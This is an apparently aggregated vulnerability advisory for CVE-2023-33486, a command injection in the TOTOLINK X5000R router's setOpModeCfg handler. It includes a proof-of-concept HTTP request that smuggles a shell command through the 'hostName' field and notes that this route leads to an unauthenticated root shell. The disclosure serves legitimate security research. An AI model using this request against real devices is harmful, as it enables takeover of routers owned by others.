Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33486: vuln/TOTOLINK/X5000R/3 at main · Kazamayc/vuln

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setOpModeCfg. This vulnerability allows an attacker to execute arbitrary commands through the “hostName” parameter.

CVE
#vulnerability#web#mac#ubuntu#linux#js#java#auth#firefox

Firmware Has an command injection vulnerability****Overview

  • Manufacturer’s website information:https://www.totolink.net/
  • Firmware download address :https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/218/ids/36.html
  • Version :TOTOLINK X5000R V9.1.0u.6118_B20201102、TOTOLINK X5000R V9.1.0u.6369_B20230113

Product Information

Analyse

TOTOLINK X5000R (V9.1.0u.6118_B20201102)was found to contain a command insertion vulnerability in setOpModeCfg.This vulnerability allows an attacker to execute arbitrary commands through the “hostName” parameter.

Be careful to set the value of the parameter “proto” to a number other than 3, 4, or 6 when sending a packet, as only the “default” value can trigger our vulnerability.

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)

  2. Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.3.2 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 90 Origin: http://192.168.3.2 Connection: close Referer: http://192.168.3.2/advance/time.html?time=1679126798322 Cookie: SESSION_ID=2:1679122532:2

{
"proto":"1",
"hostName":"';echo yichen > /tmp/1.txt;' ",
"topicurl":"setOpModeCfg"
}

Finally, you can write exp to get a stable root shell without authorization.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907